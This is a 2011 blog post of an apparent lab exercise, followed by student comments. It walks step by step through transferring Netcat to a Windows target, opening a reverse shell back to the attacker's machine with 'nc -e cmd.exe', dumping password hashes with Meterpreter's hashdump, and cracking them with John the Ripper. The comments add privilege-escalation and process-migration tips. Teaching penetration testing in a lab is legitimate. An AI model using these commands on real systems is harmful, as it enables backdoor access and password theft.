Thursday, December 1, 2011

Project 11 - Setting Up a Reverse Shell, Dumping Passwords, and Cracking Passwords

 Using Netcat to Set Up a Reverse Shell

Exercise 1: using Netcat for a reverse shell: in the following exercise, you will use the Meterpreter payload from the previous lab to set up a Netcat listener (AKA reverse shell). This will allow you to remotely control the target system after you close your Meterpreter session and thus, come back to the target system whenever you want:
1. The first step in setting up a Netcat listener is to get the Netcat executable on the target system so it can be used to interact with your attack system. There are a number of ways this can be accomplished. You’ll use Trivial File Transfer Protocol (TFTP) to copy the Netcat executable from your BackTrack system to the target system

2. In the bottom left of your BackTrack desktop, click the dragon-looking icon/Services/TFTPD/Start TFTPD. This will start the TFTP daemon (or server service) on your BackTrack system. You should get a message that the TFTPD is running on port 69 and the home directory is /tmp. Click the OK button

3. You are now going to copy the Netcat executable from its default location (/pentest/windows_binaries/tools) to the /tmp directory on your BackTrack system so it can be TFTPed down from the target system. To do so, open a new shell (leave the current Meterpreter shell open) and type the following (only type what’s in bold):
user1@pentest:~#cp /pentest/windows-binaries/tools/nc.exe /tmp

4. Change into the /tmp directory and list the contents of this directory (only type what’s in bold):
user1@pentest:~#cd /tmp
user1@pentest:~#ls -al
Look for the nc.exe file in this directory

5. Leave this shell open

6. Go to the Meterpreter shell you left open. At the Windows command shell prompt, type the following (only type what’s in bold):
C:\WINDOWS\system32>tftp -i BackTrack_IP_address get nc.exe
Syntax breakdown:
tftp: program name
-i: specifies the binary image transfer mode (which means to move the binary file byte by byte)
BackTrack_IP_address: IP address of your BackTrack system
get nc.exe: transfers the nc.exe file from your BackTrack system to the target system
If the file transfer was successful, you should see a message similar to this: “Transfer successful: 59392 bytes in 1 second, 59392 bytes/s”

7. Now you will set up both the client and server portions of the backdoor

8. In the second shell you opened in step #3 (not the Meterpreter shell), start the Netcat program on your BackTrack system in listening mode (server mode) by typing the following (only type what’s in bold):
user1@pentest:~#nc -v -l -p 3333
Syntax breakdown:
nc: program name
-v: verbose mode
-l: listen mode (listen for inbound connections)
-p 3333: local listening port on the BackTrack system

9. From the Meterpreter shell (where you have the Windows command shell prompt open on the target system), start the client side of the Netcat backdoor (only type what’s in bold, on one line):
C:\WINDOWS\system32>nc -e cmd.exe BackTrack_IP_address 3333
Syntax breakdown:
nc: program name
-e cmd.exe: inbound program to execute
BackTrack_IP_address 3333: your BackTrack system’s IP address and listening port for incoming connections
This will shovel a Windows command shell from the target system to your BackTrack system, appearing in the non-Meterpreter shell you opened in step #3

10. Close the Meterpreter shell window (click the X in the upper-right corner of the window)

11. Notice your BackTrack prompt has turned into a Windows command shell prompt. You now have a backdoor into the target system

12. Type (only type what’s in bold):
C:\WINDOWS\system32>dir nc.exe

13. Leave your Netcat listener shell open

Exercise 2: Using Meterpreter to Dump Windows Password Hashes
 Using Meterpreter to Dump Windows Password Hashes: in the following exercise, you will use the built-in capability of the Meterpreter payload to dump the password hashes of the accounts on your target system. These hashes will be used later in password cracking attempts, with the ultimate goal of getting additional usernames and passwords:

1. Close your reverse shell and return to the Meterpreter prompt (only type what’s in bold):
C:\WINDOWS\system32>exit

2. With a Meterpreter shell in place type (only type what’s in bold):
meterpreter > hashdump

3. The contents of the target system’s password hash file are output to the screen.
The passwd file contains user account information and looks as follows:
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582:::
User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904:::
User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E:::
User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::
Each field is separated with colon. The fields are:
 1st field: username (Administrator, User1, etc.)
 2nd field: Relative Identification (RID): last 3-4 digits of the Security Identifier (SID), which are unique to each user
 3rd field: LM hash
 4th field: NTLM hash

4. Based on previous lab techniques, determine a way to get the contents of the hashdump output from your BackTrack system to your Windows attack system

5. Save the file as hashes.txt to the c:\temp drive on your Windows attack system

Exercise 3: Cracking Windows Password Hashes Using John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of *NIX, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak passwords. In the rest of this lab, John the Ripper will be referred to as John.  In the following exercise, you will use the command-line version of John to crack the LM password hashes from your target system:

1. Get the password hashes from your target system to your BackTrack system, saving them in /root/ceh, in a file called hashes.txt

2. Change into the directory where John is located (only type what’s in bold):
user1@pentest:~#cd /pentest/passwords/jtr
user1@pentest:~#pwd
/pentest/passwords/jtr

3. Type (only type what’s in bold):
user1@pentest:~#./john /root/ceh/hashes.txt
Syntax breakdown:
./john: program name
/root/ceh/hashes.txt: the password hashes from your target system
Your output will look something like this:
Loaded x password hashes with no different salts (NT LM DES [32/32 BS])
PACHYDE (smendez?e?:1)
RM (smendez?e?:2)
guesses: x time: 0:00:08:23 100% c/s: 9204K trying: ZYUUZOK - ZZZZZZZ

4. In a second BackTrack shell, use the --show option to display the password cracking status (only type what’s in bold):
user1@pentest:~#./john --show /root/ceh/hashes.txt | less

NOTE: you will need to re-run this command multiple times to get the latest information relating to cracked passwords and remaining hashes left to crack

3 comments:

  1. Command to open a Windows command shell through Meterpreter : execute -f cmd.exe -i -H

    ReplyDelete
  2. Had a few problems in this assignment, posting some solutions.

    Exercise 1: In step 6/7, it has you transfer the nc.exe file to the remote Windows machine via tftp. I was getting a timeout error when I tried to send the file through tftp. I checked the /var/log/daemon.log file on the Backtrack machine and from what I could gather, the tftp daemon on the backtrack machine could not connect to the Windows machine on ports 1322 and 1336. I don't know where the .conf file for tftpd is located on Backtrack installations, so I decided to forego the tftp and just download the nc.exe file through other means that wouldn't work in a real hacking scenario. I uploaded the file and downloaded it to the desktop on the Windows machine (Link here : http://www.4shared.com/file/j2A4LPVk/nc_online.html?)

    I then continued on with project 11 as if steps 6-7 worked. In retrospect, I think this exercises would have worked without doing steps 6-7 or my workaround, although I'm not certain.

    Exercise 2:
    When you get to step 2, if you are entering in hashdump and it's telling you the command isn't found, first try running the command "use priv". After that, try it again, and it should work. This ended up outputting a large block of hashes. I also figured out if I while in the meterpreter shell, if I viewed the process list by typing in "ps", found a service process(I used svchost.exe), and then typed in "migrate [PID]", I could then type in "run hashdump", and it would output only the hashes for the Administrator and Guest account. My problem at this point was getting the hashdump output into a text file to send to the Windows machine, since the meterpreter shell doesn't accept output redirection like Linux's BASH shell does ( The > and >> characters that we have used in previous exercises). I ended up just copying the Administrator and Guest entries in the nano text editor and saving the file as "/root/hashes.txt"

    I then used JTR to crack the hash file, and while it ends up saying that cracking the two hashes completed successfully, it doesn't actually output the passwords as it should. Oh well.

    ReplyDelete
  3. I apologize for the grammatical errors. Project 11 fried my little brain :(

    ReplyDelete